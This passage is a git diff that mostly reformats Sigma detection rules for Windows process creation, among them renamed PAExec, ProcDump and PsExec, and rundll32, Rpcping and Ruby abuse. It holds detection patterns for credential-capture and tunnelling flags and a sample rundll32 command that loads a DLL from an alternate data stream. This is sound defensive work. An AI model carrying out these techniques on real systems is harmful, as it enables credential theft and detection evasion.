a/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_ftp.yml @@ -1,8 +1,7 @@ title: Renamed FTP.EXE Execution id: 277a4393-446c-449a-b0ed-7fdc7795244c status: test -description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata - fields +description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields references: - https://lolbas-project.github.io/lolbas/Binaries/Ftp/ author: Victor Sergeev, oscd.community diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml index b8c519f0c..d76e0524a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_gpg4win.yml @@ -1,8 +1,7 @@ title: Renamed Gpg.EXE Execution id: ec0722a3-eb5c-4a56-8ab2-bf6f20708592 status: experimental -description: Detects the execution of a renamed "gpg.exe". Often used by ransomware - and loaders to decrypt/encrypt data. +description: Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data. references: - https://securelist.com/locked-out/68960/ author: Nasreddine Bencherchali (Nextron Systems), frack113 diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml index eb858ffd9..6fb7539a7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_jusched.yml @@ -1,8 +1,7 @@ title: Renamed Jusched.EXE Execution id: edd8a48c-1b9f-4ba1-83aa-490338cd1ccb status: test -description: Detects the execution of a renamed "jusched.exe" as seen used by the - cobalt group +description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group references: - https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf author: Markus Neis, Swisscom diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml index 602ddf86a..d5d05d573 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_mavinject.yml @@ -1,15 +1,14 @@ title: Renamed Mavinject.EXE Execution id: e6474a1b-5390-49cd-ab41-8d88655f7394 status: test -description: Detects the execution of a renamed version of the "Mavinject" process. - Which can be abused to perform process injection using the "/INJECTRUNNING" flag +description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - https://twitter.com/gN3mes1s/status/941315826107510784 - https://reaqta.com/2017/12/mavinject-microsoft-injector/ - - https://twitter.com/Hexacorn/status/776122138063409152 + - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet - https://github.com/SigmaHQ/sigma/issues/3742 - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection author: frack113, Florian Roth diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml index 22c6e6046..bb3407ee7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_megasync.yml @@ -1,8 +1,7 @@ title: Renamed MegaSync Execution id: 643bdcac-8b82-49f4-9fd9-25a90b929f3b status: test -description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware - families like Nefilim, Sodinokibi, Pysa, and Conti. +description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. references: - https://redcanary.com/blog/rclone-mega-extortion/ author: Sittikorn S diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml index 8c73677ad..e280a4706 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_netsupport_rat.yml @@ -1,8 +1,7 @@ title: Renamed NetSupport RAT Execution id: 0afbd410-de03-4078-8491-f132303cb67d status: test -description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via - Imphash, Product and OriginalFileName strings +description: Detects the execution of a renamed "client32.exe" (NetSupport RAT) via Imphash, Product and OriginalFileName strings references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Product|contains: NetSupport Remote Control - - OriginalFileName|contains: client32.exe - - Imphash: a9d50692e95b79723f3e76fcf70d023e - - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E + - Product|contains: NetSupport Remote Control + - OriginalFileName|contains: client32.exe + - Imphash: a9d50692e95b79723f3e76fcf70d023e + - Hashes|contains: IMPHASH=A9D50692E95B79723F3E76FCF70D023E filter: Image|endswith: \client32.exe condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml index ca232ddde..8158f4045 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_office_processes.yml @@ -18,24 +18,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: - - Excel.exe - - MSACCESS.EXE - - MSPUB.EXE - - OneNote.exe - - OneNoteM.exe - - OUTLOOK.EXE - - POWERPNT.EXE - - WinWord.exe - - Description: - - Microsoft Access - - Microsoft Excel - - Microsoft OneNote - - Microsoft Outlook - - Microsoft PowerPoint - - Microsoft Publisher - - Microsoft Word - - Sent to OneNote Tool + - OriginalFileName: + - Excel.exe + - MSACCESS.EXE + - MSPUB.EXE + - OneNote.exe + - OneNoteM.exe + - OUTLOOK.EXE + - POWERPNT.EXE + - WinWord.exe + - Description: + - Microsoft Access + - Microsoft Excel + - Microsoft OneNote + - Microsoft Outlook + - Microsoft PowerPoint + - Microsoft Publisher + - Microsoft Word + - Sent to OneNote Tool filter_main_legit_names: Image|endswith: - \EXCEL.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml index 4a3712fe8..1aeefd6d5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,8 @@ title: Renamed PAExec Execution id: c4e49831-1496-40cf-8ce1-b53f942b02f9 related: - - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b - type: obsoletes + - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b + type: obsoletes status: test description: Detects execution of renamed version of PAExec. Often used by attackers references: @@ -23,28 +23,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: PAExec Application - - OriginalFileName: PAExec.exe - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Description: PAExec Application + - OriginalFileName: PAExec.exe + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: - - Image|endswith: \paexec.exe - - Image|startswith: C:\Windows\PAExec- + - Image|endswith: \paexec.exe + - Image|startswith: C:\Windows\PAExec- condition: process_creation and (selection and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PAExec with their software and rename it, so - that it is less embarrassing - - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" - directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" + - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing + - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml index b2a30c95c..c4814e7fd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_pingcastle.yml @@ -1,8 +1,7 @@ title: Renamed PingCastle Binary Execution id: 2433a154-bb3d-42e4-86c3-a26bdac91c45 status: experimental -description: Detects the execution of a renamed "PingCastle" binary based on the PE - metadata fields. +description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. references: - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ - https://www.pingcastle.com/documentation/scanner/ @@ -22,34 +21,34 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: - - PingCastleReporting.exe - - PingCastleCloud.exe - - PingCastle.exe - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - OriginalFileName: + - PingCastleReporting.exe + - PingCastleCloud.exe + - PingCastle.exe + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' filter_main_img: Image|endswith: - \PingCastleReporting.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml index 8bc965fe0..62cb55821 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_plink.yml @@ -20,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: Plink - - CommandLine|contains|all: - - ' -l forward' - - ' -P ' - - ' -R ' + - OriginalFileName: Plink + - CommandLine|contains|all: + - ' -l forward' + - ' -P ' + - ' -R ' filter: Image|endswith: \plink.exe condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml index 828cf1f44..2026d2dea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_pressanykey.yml @@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Renamed Execution id: 65c3ca2c-525f-4ced-968e-246a713d164f related: - - id: a20391f8-76fb-437b-abc0-dba2df1952c6 - type: similar + - id: a20391f8-76fb-437b-abc0-dba2df1952c6 + type: similar status: test -description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", - which can be abused as a LOLBIN to execute arbitrary binaries +description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml index 25b439fd6..37bb3c410 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml @@ -1,12 +1,10 @@ title: Potential Renamed Rundll32 Execution id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: derived + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: derived status: test -description: Detects when 'DllRegisterServer' is called in the commandline and the - image is not rundll32. This could mean that the 'rundll32' utility has been renamed - in order to avoid detection +description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ @@ -24,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter: Image|endswith: \rundll32.exe condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml index 810b9860c..5fb8b84d2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_rurat.yml @@ -1,8 +1,7 @@ title: Renamed Remote Utilities RAT (RURAT) Execution id: 9ef27c24-4903-4192-881a-3adde7ff92a5 status: test -description: Detects execution of renamed Remote Utilities (RURAT) via Product PE - header field +description: Detects execution of renamed Remote Utilities (RURAT) via Product PE header field references: - https://redcanary.com/blog/misbehaving-rats/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml index 34ee78ada..daf4819f1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml @@ -1,11 +1,10 @@ title: Renamed ProcDump Execution id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 related: - - id: 03795938-1387-481b-9f4c-3f6241e604fe - type: obsoletes + - id: 03795938-1387-481b-9f4c-3f6241e604fe + type: obsoletes status: test -description: Detects the execution of a renamed ProcDump executable often used by - attackers or malware +description: Detects the execution of a renamed ProcDump executable often used by attackers or malware references: - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -25,19 +24,18 @@ detection: selection_org: OriginalFileName: procdump selection_args_ma: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_args_other: - CommandLine|contains: + CommandLine|contains: - ' -accepteula ' - ' /accepteula ' filter: Image|endswith: - \procdump.exe - \procdump64.exe - condition: process_creation and ((selection_org or all of selection_args_*) and - not filter) + condition: process_creation and ((selection_org or all of selection_args_*) and not filter) falsepositives: - Procdump illegaly bundled with legitimate software - Administrators who rename binaries (should be investigated) diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml index 74e9814c8..30ea5d40a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_psexec_service.yml @@ -1,8 +1,7 @@ title: Renamed PsExec Service Execution id: 51ae86a2-e2e1-4097-ad85-c46cb6851de4 status: test -description: Detects suspicious launch of a renamed version of the PSEXESVC service - with, which is not often used by legitimate administrators +description: Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators references: - https://docs.microsoft.com/en-us/sysinternals/downloads/psexec - https://www.youtube.com/watch?v=ro2QuZTIMBM diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml index 2f4cd0b7d..08840ddfa 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_sysinternals_sdelete.yml @@ -1,8 +1,7 @@ title: Renamed Sysinternals Sdelete Execution id: c1d867fe-8d95-4487-aab4-e53f2d339f90 status: test -description: Detects the use of a renamed SysInternals Sdelete, which is something - an administrator shouldn't do (the renaming) +description: Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming) references: - https://docs.microsoft.com/en-us/sysinternals/downloads/sdelete - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml index a8964dfc1..2e4409ebe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_vmnat.yml @@ -1,8 +1,7 @@ title: Renamed Vmnat.exe Execution id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: test -description: Detects renamed vmnat.exe or portable version that can be used for DLL - side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading references: - https://twitter.com/malmoeb/status/1525901219247845376 author: elhoim diff --git a/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml b/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml index 147cb5654..aedd5909b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_renamed_whoami.yml @@ -1,8 +1,7 @@ title: Renamed Whoami Execution id: f1086bf7-a0c4-4a37-9102-01e573caf4a0 status: test -description: Detects the execution of whoami that has been renamed to a different - name to avoid detection +description: Detects the execution of whoami that has been renamed to a different name to avoid detection references: - https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/ - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml b/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml index f3cd0d512..6a7c57bd2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rpcping_credential_capture.yml @@ -1,8 +1,7 @@ title: Capture Credentials with Rpcping.exe id: 93671f99-04eb-4ab4-a161-70d446a84003 status: test -description: Detects using Rpcping.exe to send a RPC test connection to the target - server (-s) and force the NTLM hash to be sent in the process. +description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. references: - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/ - https://twitter.com/vysecurity/status/974806438316072960 @@ -25,22 +24,22 @@ detection: use_rpcping: Image|endswith: \rpcping.exe remote_server: - CommandLine|contains: + CommandLine|contains: - -s - /s ntlm_auth: - - CommandLine|contains|all: - - -u - - NTLM - - CommandLine|contains|all: - - /u - - NTLM - - CommandLine|contains|all: - - -t - - ncacn_np - - CommandLine|contains|all: - - /t - - ncacn_np + - CommandLine|contains|all: + - -u + - NTLM + - CommandLine|contains|all: + - /u + - NTLM + - CommandLine|contains|all: + - -t + - ncacn_np + - CommandLine|contains|all: + - /t + - ncacn_np condition: process_creation and (use_rpcping and remote_server and ntlm_auth) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml index b9e318b94..01440352b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ruby_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Ruby Inline Command Execution id: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8 status: test -description: Detects execution of ruby using the "-e" flag. This is could be used - as a way to launch a reverse shell or execute live ruby code. +description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \ruby.exe - - OriginalFileName: ruby.exe + - Image|endswith: \ruby.exe + - OriginalFileName: ruby.exe selection_cli: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml index c87d4287a..6beb7f448 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml @@ -1,8 +1,7 @@ title: Potential Rundll32 Execution With DLL Stored In ADS id: 9248c7e1-2bf3-4661-a22c-600a8040b446 status: test -description: Detects execution of rundll32 where the DLL being called is stored in - an Alternate Data Stream (ADS). +description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). references: - https://lolbas-project.github.io/lolbas/Binaries/Rundll32 author: Harjot Singh, '@cyb3rjy0t' @@ -20,10 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' + # Example: + # rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain + # Note: This doesn't cover the use case where a full path for the DLL isn't used. As it requires a more expensive regex + CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml index e97e31a9b..fdb5ebbd5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml @@ -1,8 +1,7 @@ title: Suspicious Advpack Call Via Rundll32.EXE id: a1473adb-5338-4a20-b4c3-126763e2d3d3 status: experimental -description: Detects execution of "rundll32" calling "advpack.dll" with potential - obfuscated ordinal calls in order to leverage the "RegisterOCX" function +description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function references: - https://twitter.com/Hexacorn/status/1224848930795552769 - http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ @@ -19,16 +18,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_dll: - CommandLine|contains: advpack + CommandLine|contains: advpack selection_cli_ordinal: - - CommandLine|contains|all: - - '#+' - - '12' - - CommandLine|contains: '#-' + - CommandLine|contains|all: + - '#+' + - '12' + - CommandLine|contains: '#-' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml index 1acf590be..a04ad8f73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_by_ordinal.yml @@ -22,16 +22,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ',#' - ', #' - - '.dll #' - - '.ocx #' + - '.dll #' # Sysmon removes , in its log + - '.ocx #' # HermeticWizard filter_edge: - CommandLine|contains|all: + CommandLine|contains|all: - EDGEHTML.dll - '#141' filter_vsbuild_dll: @@ -39,15 +39,14 @@ detection: - \Msbuild\Current\Bin\ - \VC\Tools\MSVC\ - \Tracker.exe - CommandLine|contains: + CommandLine|contains: - \FileTracker32.dll,#1 - \FileTracker32.dll",#1 - \FileTracker64.dll,#1 - \FileTracker64.dll",#1 condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment - Windows control panel elements have been identified as source (mmc) level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml index 598f9e85a..17c96a484 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_inline_vbs.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Invoking Inline VBScript id: 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd status: test -description: Detects suspicious process related to rundll32 based on command line - that invokes inline VBScript as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) @@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - Execute - RegRead diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml index 5f5f94172..ca22189fe 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_installscreensaver.yml @@ -1,8 +1,7 @@ title: Rundll32 InstallScreenSaver Execution id: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 status: test -description: An attacker may execute an application as a SCR File using rundll32.exe - desk.cpl,InstallScreenSaver +description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver references: - https://lolbas-project.github.io/lolbas/Libraries/Desk/ - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - Image|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: InstallScreenSaver + CommandLine|contains: InstallScreenSaver condition: process_creation and (all of selection_*) falsepositives: - Legitimate installation of a new screensaver diff --git a/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml b/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml index 80bd3c071..47422f621 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml @@ -1,8 +1,7 @@ title: Rundll32 JS RunHTMLApplication Pattern id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 status: test -description: Detects suspicious command line patterns used when rundll32 is used to - run JavaScript code +description: Detects suspicious command line patterns used when rundll32 